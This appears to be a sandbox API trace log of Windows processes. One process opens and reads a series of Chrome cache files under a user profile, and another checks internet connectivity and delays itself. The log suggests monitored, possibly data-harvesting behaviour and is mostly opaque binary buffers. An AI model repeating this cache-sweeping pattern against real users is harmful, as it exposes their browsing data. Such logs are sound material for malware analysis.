Buffer => '7x\xfd,hf\x07\xc1S\xc1Q\xc9)i"\xda\x81\x10\x87g\x96\xe4\x82n\x15\x00\x16`EHr)9\xc9\x90\xbb\x062S\xe2!\xd1\xa8\xa4\x83\x08\x14\x9c\xc6c\x0cg)\xe1039#3'\x05\xb4\xc0\x06\x9fK\x0b\x8aR\xa1\x17\x1b\x81n\x9eR\x80\xad\xefL\xd6Cu9\xe8vPp;\x0e4\xf5\\xa4\xad\x04\xbe\xbc\x93<\x831\x9c\x88bv&\xd5\xcc\x86\x04)\x8a\xe1\xf0\xd0\x85Y\xa2 \xe9\xcb\xe9\x11\xd9m\xd5)E\x84t\x0107\x80JU`v\xcc\x01\xf5\x9d\x90[\xa3\xe0\x0e\x00\xd0\xfaD\x1c\x92x:\x0e\xc9\xb03cpw)\xc07\x0c\x95\xc2\xea\x0c\x14\xa7\x82\xda\x83\xd8L\x83JP2\xe3\x0f,\x03\xc2\xc1\xe5&\x96\x01)\x84\5t\x9c \xd8\xf7\x83\x88 U\x9e\x90{\x8b@\x85J\xa9N\x11\xa8E\x03\x8a\xd5D\xa4\x05\x84(\xf7\x1c\x80\xa2\x05\x16!\xba\x90\x12\x1b~N\x11h\xaeJ \xd1\x1a\x01\x15 \xd8W\x92\x82+@\xac FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,146 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,146 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00004e DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,166 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03rH\xcb\xcf+\xd1MKLN\xad\x86\xb2r3s*\xad\xd4\xcb\xd3\xe2\x8bS\xd3\xf3SuK3\xe3s2\xd33J\xd4\xad\x8b\x8b\x92\xadJ\x8br4\xd4\xf5\xf53\xf5\x8aus3\x93\x8b\xf2\x8b\xf3\xd3J\xf4\x92\xf3s\xf5A\x9a\x8b\xf5aZ\xf4\xcbS\x8bKtSK\x8b\xf2\x0bR\x13\xf3\xf4\xc1\x06\xe8\xe7$\x96\x00E\xf5R\xf3K\xd45\xc1\x86\xe5\xe4''\xe6h(\x05\x834)\x84z*\xf8\x80\x94)i\xea\xa0\x88\x87\x07\xc0\xc5\xa9c\xb9\xbdrfjZf\x85\xba\xa6BZ~Qnb\x89\x86zjnRjJJj\x8a.PC^IeA\xaa:U\xec*\xcfOKC\xb2\x05\xc2\xa5\x86\xc1%%\xc8\xe6\x96\x14\x95\xa6R\xcf\xd1\xc5e\xe9\xca\xe5\xa9IH\xe6\x03E\x80\xf1\x05N\x1c\xe5\xa9 \xa5Vy \x99\x1c\x88PqIeN*T\xa4\xd6\x01,\x84?1A\x94R\x92\x9a &\x10LNh 3 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,246 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,246 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000051 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,266 | 504 | NtReadFile |
Buffer => /*
* For font license information, see the CSS file loaded by this JavaScript.
*/
if(!window.Typekit)window.Typekit={};window.Typekit.config={"c":[".Text","\"adobe-clean\",sans-serif"],"f":"//fonts.adobe.com/k/c/yoe7ink-{format}.css","fn":["adobe-clean", FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,316 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,316 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000057 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,336 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xad\xbdk{\xdb\xb6\xb20\xfa\xf9\xe4y\xd6\x7f\x90\xbd\xce\x12\xc9\x12\x96%\xe7\xd6\x9aAt\x9cKW\xf3\xee\\xba\xebd\xa5]\xb6_\x1f\x8a\xa4$Z\x14I\x91\x94,\xc5\xd6\xfe\xedg. Rr\xda\xbd\xdf\x93\xd6\x14\x89\xeb`0\x18\x0c\x06\x83\xc1\xca\xcd:\xf9u\xe1]O\x82\xc2\xf5\x93Q\xe0%s\x19\x07\xb7\x9d\xcf\xee\xe4u\x12\x17n\x18\x07\x99ih\xb1\x86\xe5<z4^\xc6^\x11&q3Yl\xdd\xad\xa0\xbcB\x16\xd30\x17\xb7\xb2\xe8\xdd\xca\xdb0\xf6\x93[\xa7\xe8\xf9\xf2\xb6\xe7'\xder\x1e\xc4\x05|^{\xd2\x80\x8a
'\x1c\x9b\x07\xb7\xbd\xfc\xda\xbb\x0e#\xeb\xae|\x93\x17W\x8ez\x8fe\x7f\x0b\xe9!\xac\x8c\xc4\xec\x10\\xc6\xd3gtA\x81W\xb2\xa8\xf2\xd96\xc4\x14^\x0cpD\xb2\x0f\xefy\xe1\xc9\x12r\x04\xf6\x91\x06m\x84\xd0\xaa\xf2E(\xd6*k\x8c\xf0E\xd68\xc9\xcc\x10\xca\x08_D\xbd(\x88 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,387 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,387 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000058 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,397 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xdc\xbdks\xdbF\xd20\xfa9\xae\xca\x7f\xa0\xb4\xef\x12D8\xa2H\xf9\x96%5f\xc9\x96\x93h\x1f\xdf\x9e\xd8N6+\xa9T \x00\x8a\x90@\x00\x04@\x8a\xb4\xc4\xf7\xb7\x9f\xbe\xcc\x00\x03\x90\xb4\x93}N\x9d\xf3\x9e\xe3\xb2@`\xee\xd3\xd3\xd3\xd3\xdd\xd3\xd3\xb3p\xd2Fv\x95\xbbW'\xafN_\xc9\xc8\xbfk|r\xae_\xc5Q\xee\x04\x91\x9f\xb6,\x0c\xb6\xec\xc1\xa3G\xe3y\xe4\xe6A\x1cU\xe3#\xfb~\x01%\xe42\x9f\x04\x99\xb8\x93y\xe7N\xde\x05\x91\x17\xdf
\xf2\x8e'\xef:^\xec\xce\xa7~\x94\xc3\xe7\x95+-\xa8\xca\x1a\x04\xe3\xd6\xde]'\xbbr\xaf\x82\xd0\xbe\xd7o\xf2\xfcr\xa0\xde#\xd9]Cz\x08\xd3\x91\x98\x1d\x82u<}\x86\xe7\x14x)\xf3"_\xbb
1\xb9\x1bA;B\xd9\x85\xf7,w\xa5n96\xf6\x91\xd1\xda\x10[\xab\xca\x17\x81X\xaa\xac\x11\xb6/\xb4\xc7q\xda
\xa0\x8c\xe08\xec\x84~t FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,457 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,457 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00005f DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,477 | 504 | NtReadFile |
Buffer => GIF89a\xe9\x01\x19\x00\xe6B\x00\x11\xba\xf9\x11\x86\xb2\x11\x84\xaf\x11\xbc\xfc\x11\xbd\xfe\x11\x82\xacE\xb4\xddE\xb6\xe1E\xba\xe4E\xb1\xdaE\xbe\xecE\xa9\xcfE\xc1\xefE\xbc\xe8E\xaf\xd6E\xac\xd3E\xa7\xcbE\xc4\xf3E\xc5\xf6E\xa5\xc8E\xc7\xf8E\xa3\xc5E\xc9\xfaE\xa1\xc3E\xcb\xfdE\x9f\xc1E\xcb\xfeE\x9d\xbeD\x9d\xbeC\x9c\xbeC\xa6\xcbB\xc6\xf8B\x9f\xc2C\xcb\xfeA\xaa\xd1B\xc8\xfaA\xbd\xecC\xc3\xf2B\x9d\xbfC\xae\xd6A\x9d\xbfD\xb9\xe4A\xa1\xc4B\xca\xfdD\xb1\xd9B\xad\xd6B\xa1\xc4A\xc9\xfdB\xbb\xe8C\xbb\xe8\x11\x8c\xb9\x11\xb7\xf6\x11\xb5\xf3\x11\x89\xb5\x11\x91\xc1\x11\xb0\xeb\x11\xb3\xef\x11\x8e\xbd\x11\x95\xc6\x11\xac\xe7\x11\xa2\xd9\x11\xa9\xe2\x11\x98\xcb\x11\x9f\xd4\x11\x9b\xcf\x11\xa6\xdd\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,667 | 504 | NtReadFile |
Buffer => \x0e\xf2-!\xe1*\xcb\xac\xb3\xe7J\x9b\xae\xb5\xebj\xdb\xae\xb7\xef\x8a\x1b\xaf\xb9\xd0\xa2[\xaf\xba\xf7\xb2\x9b\xaf\xbb\xfb\xc2\xdb\xaf\xbc\xff\xd2K\xad\xbd\x03\xe3[\xb0\xbe\x84\x1c@
\x0f\x8e(\xec \xc3\x8b8\xec\x08\xc4\x88H\xbc\x08\xff\xc5\x85X\x8c\x08\xc6 /\xdc\xb0\xc7\x11\x83\\xb1\xc8\x19\x93\xdc\xf1\xc3\x1f\xa3\x1c\xb2\xca#\xb3\\xb2\xcb'O\x9c\xb2\xcc+\xd3\xdc\xb2\xcd/\xe3\x1c\xf3\xc53\xf3\\xb3\xcf7\x03\x9d\xf3 \x06\x90\xf2\x83#E{r\xf4"I;\xb24"M/\xf2t!Q#25!U\x17r5\xd1F#\xdd5\xd3_C\x1d6\xd5cc]6\xd7J{\x9d6\xd8k\x8b\xdd6\xd9o\x9b\x1d7\xdaN\xab]7\xdbw\xbb\x9d7\xdc{\xcb\xdd7\xdd\x83$@
\x10\x8e\x08\xee \xe1\x8b\x18\xee\x08\xe2\x88(\xbe\x08\xe3\x858\x8e\x08\xe4\x84H^\x08\xe5\x81\x0f^\xb8\xe6\x89s\xde\xb8\xe7\x91\x83^\xb9\xe8\x99\x1f\xbe\xb9\xe9\x9d\xa3\xfe\xb9\xea\xa1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,677 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,677 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => p\x00\x00\x00\x00\x00\x00\x00\xd0\x7f\xa1\xec\xe3\x91\xcf\x01\x80@\xaf\xec\xe3\x91\xcf\x01\x80@\xaf\xec\xe3\x91\xcf\x01\x80@\xaf\xec\xe3\x91\xcf\x01\x88#\x10\x00\x00\x00\x00\x00\x000\x10\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\x00_\x000\x000\x000\x000\x006\x006\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\xf05\xc0\xf9\xe3\x91\xcf\x01\xf05\xc0\xf9\xe3\x91\xcf\x01\xf05\xc0\xf9\xe3\x91\xcf\x01\xf05\xc0\xf9\xe3\x91\xcf\x01n\x96\x00\x00\x00\x00\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\x00_\x000\x000\x000\x000\x006\x007\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\xd0\x15\x93\xfa\xe3\x91\xcf\x01`\xab\x97\xfa\xe3\x91\xcf\x01`\xab\x97\xfa\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:08,677 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000067 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,697 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03\xb2Qt\xf1w\x0e\x89\x0cpU\xc8(\xc9\xcd\xb1\xe3\xb2\x01Q
\x15\xb99V9\x89y\xe9\xb6J\xae~J ^^\xb1\xadRFII\x81\x95\xbe~yy\xb9^\xb9\xb1^~Q\xba\xbe\xa1\xa5\xa5\xa5~\x05H\x87\x92\x02Dyj\x9e\x12\xc8\x8c\xd4\xc4\x14;.N\x9b\xe2\xe4\xa2\xcc\x82\x12\x85\xe2\xa2d[%}\xfd\xc4\xe2\xe2\xd4\x92b\xbd\xc4\x94\xfc\xa4\xd4\x94\x92\\xbd\xe4\xfc\}3S\xcb\xd4d\x8b\xc4\x94DS\x13S\x83\x94$KS3s\xd3T\x13\xe3\xa4\xd4\xc4\xc4\xc4TK#cKKSK\xc3DCC\xfd\xe2\xc4\x92\xd4\x9c\x9c\xcc\x92T\x9f\xcc$]\x13\xb3T3\xd3\x94$\xd3\xa4$\x83dcs\xd34\x8b43\x133C\xcb\xa4Tc\xc3\xe4d\xcb$#\xcb\xc4\xe44\x13\x0b3s\xbd\xacb%;\x1b}\x883\xec\xb8\x14\x90\x80MnjI\xa2B^bn\xaa\xadRr~^Ij^\x89nIeA FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,737 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:08,737 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:08,737 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:08,737 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:08,737 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:08,767 | 504 | NtReadFile |
Buffer => d\xe7T\xa9\x00\xb633/]\x01\xe2\x0c\x1dp\xb4&&'\xa7\x82\xc6`3R\x15\xf0\x0f\x16\xe5f\x16'\xeb\x97\xa4\x16\xe5\x16\xebe\x94\xe4\xe6\xc0C\x08\xe2u\xb8OK\x12\x8b\xd2SKl\x95\xe2\x9dr\x12\xf3\xb2\x95\xec\x1cA\x06(\x84\x80\xf4)\xe4\xa7)\x84\x16\xa7\x82F\x95\xf4\x10\xa56\x96\xf8+\xc9\xc8F\xa4C\x98=\x08/\x82RI\x89\xb5\x02X\x00\xd6\xe3H\xca\xcfII-\xb2V\xc0l\xa3* \xe7\x17\x05p%\xadd\x17\x92\x91\x98\x97
\xf6\x7fZ~\x91BI"8X@%\x7fqiQYj\xa5\x9eBx*$\xce \xf5\x01\xac\xceD8\x1b\xc9aH\x83\x08\x98\xb6CS\x1e\xc8nCP\xf3\x055\xdd(\xd9y\xa6\x81]\x91\x97\x9a\x9a\xa2\x00\xaa\xabu@\x15[yb\x1e\xa8O\xad\x90\x91\x9a\x08\x1d\xce\xaf\xcc/\xc5j7\xb2\xf1\xa0\x88\xc7p\x00x\x08\x10#\x04
-\xe1i\x16\x1eq(Q\x9f\x96_T\x9a[\x8c\x88}\xccxu FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,777 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,777 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000078 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,797 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xec\xbd]s$Ir\x18\xf8\xce_Q\xc8Y\x02\x95SYYU\x00\xfa\xab
\xd9 \x1a\x8d\x9e\xc6\x0e\x1a\xddl\xa0g\xb8\x040\xb0DU\x16*\x1bY\x99\xc5\xcc,tc\x80\xa2Q\\x9e\xd9I2\xbb\x87\xa3d'\xd9\xf1\xccne\xab\x93(\x89wgG\xd1D\x93\xee\xe3a\xc9\xf7\xe5\xd3\xee\xbe\xde\x9a\xdd\x99\x892\xbb\xbfp\xee\x1e\x1f\x19\x99\x19Y(t\xf7,i\xa2f\xb7Q\x99\x91\xf1\xe1\xe1\xe1\xe1\xee\x11\xe1\xe1\xde\xfa\xfc\xf3_\xab}^\xfb\x8d\xc0\xef{a\xe2\xd5\xdc`\x1c\x85\x83Z\xdb^\xb5\x1f\xd5\xb6\xa3\xc9U\xec\x9f\x8f\xd2Z\xbdo\xd6V\xdb\x9dN\x13\xfe\xac[\xb5\xc3\x91W{\x1a\xbd\x8dj\xcf\xa2i8pS?
k[AP{\x8d\x99\x93\xdak/\xf1\xe2Ko`c\xd5[\x97\xae\x1f\xb8g\x81W\xbb\xf4\xddZ
%_\xec\x1e\xd6\xa2\xb8\x16z\xefjO\x0e\x9e\xd6x\xd3\x949\xf1\xbcnm\x94\xa6\x93 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,847 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,847 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000079 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,857 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xed\xbd{s\x1b\xc7\xb5/\xfa\xff\xfd\x14\xb8LU\xce9U\x18h\xfa\xdd\xed\xb3\xbdw)\xb4\x1d9\xa1\xbdu-[\xd9;\xb7R.h\x08 \x8c \x80\x87 )K.\x7f\xf7\xb3~\xbf\x9e\xc1\x1b\x83\x01\xc9Xr"'\x1a\xf6\x0c\xbaWw\xaf~\xad\xb5z=\x1e\x9f\xcf^\x8c\xfe8\x99\xbd\x18N\xbe\x1d\xde\x0e~\xfc\xfb|6\xbd\xfc~\xf4\xe6r2\xbc\x1e}1\xbc\x1e\x9e\x0e'\x93\x17\xc3\xea\xf5\xff\xfc\xf9\xf2j\xf6\xf2b2\xfa\xec\xe7\x9b\xcb\xc9lx\xfe\xf8V~\xbd\xfa\xe1\xbb\xb3\xcf~>\x1f\xbd\x1c\xdeL\xae\xcf.\xa6\xaf?;\x19___\xce?{\xf4hXU\xb3\x9b\xe9\xf5|0D\x15\x83j\xf6\xe6Q
\xe1\xe4\x97\xfe*\x88\xaf\xab\xd9\xf4\xb3\xff\xf1o\xf3\xdbW\xbd\xdb\xd1\xd5\xfcb6\xfd\xfcD
\xd4I\xef\xa77\x93\xe9\xfcs\x02\x14xo\xdf\xbe\x1d\xbc5\x83\xd9\xd5\xabG\xba,\xcbG\x92\xbf\xce\xf2\xd9O FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,907 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,907 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00007a DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,917 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xbc}w_\xdb\xc8\xda\xe8\xff|
\xa3\x93\x0bR<\x08;e\x8b\x84\xe2\x17\x08)\x9bB\x16\xc8f\xb3\xc6\x9b\x9f\xaa\xed\xe0\x86eS\x02\xfe\xee\xf7)3\xd2\xa8@\xb2\xfb\x9e{s\xcebM\xef\xcf<}.\xfcy\xe3\xc1\x83\x17\xc7G
\xafq\xb3\xd6\x80\x7f\x9b\x8b\xe18N\x17\xfex\xb6\xe946\x7f\xf3'K\x7f~\xddh\xb7D\xe3Q\xab\xfd\xa4\xf1?\x8d\xb6\xf3\xf8\xa7\xc6\x87w\x9b\x82\xb3_\xc4\xf3t8\x9d`\xe6\xf6Ov\xdbn\xab\x84`9\x1cE\x18\xfd\xab\x8a\x89'~0\x8a1n1_\xc622\x99\xfb\xd0\x1e\xc4%\xfe(U\x91i\x9cb\xa5\xf3x6\xf2\xaf\x8b\xf9\xfd\xe5bZ\x8c\x89'\xe14\x8aK\xb5\x0eGT\xe9\xe6\xf6p\x12\x8e\x96Q\xbc\x9d\x86\xf3\xe1l\xb1\x9dL\xe7q\x1a\xc7\xdb\xb2O\xdb\xdb\x8dI\x1cGic1m\x04q#\x8d\x17\x8d\xcbA<i\xc8l[\x8b\xb9?Ig\xd3\xf9\xc2N/\x93 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,967 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:08,967 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00007b DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:08,977 | 504 | NtReadFile |
Buffer => /*
* For font license information, see the CSS file loaded by this JavaScript.
*/
if(!window.Typekit)window.Typekit={};window.Typekit.config={"c":[".Text","\"adobe-clean\",sans-serif"],"f":"//fonts.adobe.com/k/c/whd3raw-{format}.css","fn":["adobe-clean", FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,017 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:09,017 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00009a DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,027 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xbc\xbd\xe9v#G\x92.\xf8\x7f\x9e\x82\x88\xca\xa6"\x12N\x90LI}\xbb\x02\x0c\xe2\xa6r)\xa5J[Uf\x95\xa4\x02\x91:\xb1\x01\x08\x12\x1b\x0107\x02\xfd,\xf3\x1e\xf3c\xce\x99\x17\x9aW\x18\xfb\xcc\xdc=<\x16P\xd9}\xe7\-D,\x1e\xbe\x9a\x9b\xdbn\xa7\x8f;G\xd7\x7f\xbb\xcb\xd7\x1f\x8f\xde\x9d\xf7\xfe\xa3\xf7\xe4\xe8\xfa\x16w\xbdt9?\xda\x99\x9b\xe5zr:+\xd2|\xb1\xc9\x8f\x1e\x9f\xfe\x1f\xfe\xf8n\x91n\x8b\xe5\xc2\x8fU\x12\xdc\x9b\xbb\xa3\xbf\xf8qp\xff.^\x1f%\xd1\xcba<\x8a\xee\xf7\xfdu\xbe\xbd[/\x8eV\xbd<N\xa7~\xdc\xdb\xacf\xc5\xd6\xdf\x04\xca\xa9"
\xee\x93a:\x8a:g\xfb@%{[\xddwx\xa7\xb2\xe0\xbe\x18\xfbY\x14E\xc9\xf1q\xdc[,\xb3\xfc\xcd\xc7UN\xf7\xe7\xd2X\x1eyY\xbc\x8dO\xbcn\xda[\xe7\xabY\x9c\xe6\xfe+\xe5\x9d<:\xf7\x82\xdev\xf9\xfd FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,088 | 504 | NtReadFile |
Buffer => \xa4\xb3\xf3).!\xb4M\x19OG/8\x19K\x10 \xa2\x1f\xca\xab}\x0b\xad/d\xec-\xb2"\xe5\xec\xe7:\xb23\xc7\xaf\xa6\xe5\xcd\xf4l\xf8\x013R\xbae6\x834\xc1\x14P\xc0^\x9b\x1c\x91\x90{\xb2!nh\xcd\xd9\x1d<_\xcb\x91q\x9d\xbdQd\xb9\xf0\x9c e\x88\xe4\x94\x00\x16\x00\x08\xfd@\xe5\x9b'>\xdcEjgM@\x0c\x96\x1b\xa7\xda\xe2p\x1e\xf9\x85;\x83S\x9e\xd5\x99[t!\x13\xb8C\xb1\x91\xbc^\xc7C`\xf7 \x84\x83\xa2\xa6
/\xe9\xf3\xbe\x8a\xb9\xac;\xe1=VHV\xb3\xc9\xd2\xa9#\xde\xee\xfc\xaf+\xae\xec\x9dY\x10z+\xd07\x9ct\x8c\x92Q\x8foLW\x97A\x94\xf1\x84]\x8a\xd4\xe5\xc8'6:P\xd3\xcd\xf6\xd0\x04]u\xc2\x97\xa4\x16\x87\xe8\xd0O\xb2@ouV\x12\x13=\xdc.\x1bq\xdc\x9f\xb5\x1b;\xc2\xc3Z\x7f\xb9\xa4\x89\x9b\xa2\x91}\xc5:\xc3\xf1\x04\xfc\xb5\xcd,\xd3\xf0\x97v4q\x04\x98\xd2\xdd\xba FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,088 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:09,088 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00009c DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,108 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xed\xbdk{\x1b7\x92(\xfc\x99z\x9e\xfc\x07\xb8\x937$-\x8a\x14\xe5\xbb\x18\xc6+_\x92x\xd7\x8e\xbd\x96\x93\xc9\x1eY\xeb\xb7I6\xa5\xb6(6\xd3\xdd\x94\xad\x91y~\xfb\xa9*\xdc\xd1\xe8&)\xc9\xf6d\x9eh&4\x89K\xa1P(\x14
\x85B\xa1s\xf3\xe6\x06\xbb\xc9\xbe\xfb%
GQ\xba\xcb:Y2O\x87Qg\x94\x0c\xd3$\xc9\xe1\xdf\x0f\xd3I\x12\x8e\x86\xd14\x8f\xd2\xce\xfb\xac3\x89\xcf\xa2\xce,\x99\x84\xe9
\xd3\xf6\xfb\xacu\xc6\xba\xed\x9d.\xdb\xd9\xee\xeet\xb6\xbb\x9d\xed;\xac\xfb`\xf7\xd6\xbd\xdd[\xb7\xd8p\x12
\x8f\xa7Q\xca\x9e~\x9c\xb1\xef\xa0\xa5\x0e\xdb\x88\xc7\x8d\xfc|\x16%c\xf6\x9f\xfb/\x7f\xbd\xd1\xef\xd7\x93\xc1\xfbh\x98\xd7\x9b\x17\x98\xd0\xbfX,\x1a\xe3\xf9t\x98\xc7\xc9\xb4\xd1\xbc\xa8\xcf\xb3\x88ey\x1aC\x89\x9eLg\xe3\xc6\xb4y\x91F\xf9<\x9d\xb2\xe9\x0f\xdd\xed\x87\xf5\xed\xfa\xe6 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,158 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:09,158 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00009d DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,168 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xbc}w_\xdb\xc8\xda\xe8\xff|
